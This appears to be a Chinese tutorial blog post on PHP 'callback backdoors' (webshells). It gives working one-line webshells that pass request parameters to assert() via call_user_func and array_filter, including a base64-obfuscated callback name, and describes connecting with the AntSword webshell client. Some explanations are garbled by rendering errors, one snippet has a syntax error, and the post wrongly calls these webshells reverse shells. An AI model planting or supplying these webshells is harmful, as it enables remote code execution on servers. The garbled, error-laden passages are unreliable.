当前位置: 首页 > news >正文

回调后门基础

回调后门概述

回调后门(Reverse Shell)是一种常见的攻击方式,攻击者通过受害主机主动连接到远程服务器(攻击者控制的机器),从而获得远程控制权限。

工作原理

  1. 受害者主机 运行一个恶意代码,尝试连接攻击者控制的服务器。
  2. 攻击者主机 监听特定端口,一旦连接建立,就可以执行任意命令。

1. 初始的回调后门

call_user_func('assert',$_REQUEST['pass'];

代码解析:

  • call_user_func():把第一个参数作为回调函数调用
  • assert():用于执行字符串代码
  • $_REQUEST[‘pass’]:攻击者控制的输入

攻击示例

call_user_func('assert',$_REQUEST['pass']);
  1. 执行phpinfo()查看PHP环境信息,通过向pass传递phpinfo(),则代码执行后回显PHP版本信息
    在这里插入图片描述

  2. 蚁剑连接webshell
    在这里插入图片描述
    在这里插入图片描述

失败解析

  • assert( c o d e ) ; 等价于 i f ( ! e v a l ( code); 等价于 if (!eval( code);等价于if(!eval(code)) throw new AssertionError();
  • assert($_POST[123]); 的问题是,如果 $_POST[123] 是个未定义变量或者非字符串,它会返回 NULL,导致 assert(NULL); 直接返回 false,没有实际执行任何代码。
  • 假如eval传入的是字符串形式的php代码,assert()解析后相当于eval($_POST[]123),从而执行传入的任意命令

蚁剑默认发送的payload

  • 当body传pass= P O S T [ 123 ] 时, a s s e r t ( _POST[123]时,assert( POST[123]时,assert(_POST[123]);可能解析为assert(NULL),或者assert(空字符串),直接返回false,所以没有返回值

2.数组操作的单参数回调后门

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));

代码解析:

  • array():创建数组,包含用户传入的 $_POST[‘pass’]。
  • array_filter():使用回调函数过滤数组元素。
  • base64_decode($e):解码后作为回调函数。
  • 所以e传递assert的Base64编码(YXNzZXJ0),则 array_filter() 会执行 assert($_POST[‘pass’]);,从而执行传入的PHP代码。
    在这里插入图片描述

相关文章:

  • Day18 -实例:app信息收集工具(Appinfoscanner、Mobsf)的配置和使用
  • 从PDF到精准答案:Coze助力RAGFlow框架提升数据召回率
  • Java基本类型深度解析:从内存模型到高效编程实践
  • 【MinerU】可本地部署的PDF解析器
  • HCIP-6 DHCP
  • 软考 中级软件设计师 考点知识点笔记总结 day08 算法设计与分析
  • 设计模式 Day 1:单例模式(Singleton Pattern)详解
  • 《Operating System Concepts》阅读笔记:p495-p511
  • argparse的使用
  • 【前端】【React】第四章:深入理解 React Router 及前端路由管理
  • 使用 mpstat 与 stress-ng 进行 CPU 性能监控
  • 从0到1的数据结构教程——深入思考动态数组
  • 记录一下最近参与实习 外包 社招流程里的一些感悟
  • Java EE(18)——网络原理——应用层HTTP协议
  • 内网渗透-网络分离免杀
  • git --- cherry pick
  • 深入解析C++模板:从基础到高级应用
  • AI Agent开发大全第十五课-零售智能导购Agent的代码实现
  • Nginx RTMP 处理模块 (ngx_rtmp_handler.c) 详细分析
  • 1371. 货币系统-dp背包问题
  • 专门做照片书的网站/seochinazcom
  • 网站建设的报告/网站优化怎么操作
  • 北京朝阳区做网站/seo是哪个国家
  • wordpress http error 500/前端seo怎么优化
  • 如何策划网站/百度客服人工
  • 怎么样才能把网站关键词做有排名靠前/营销策划思路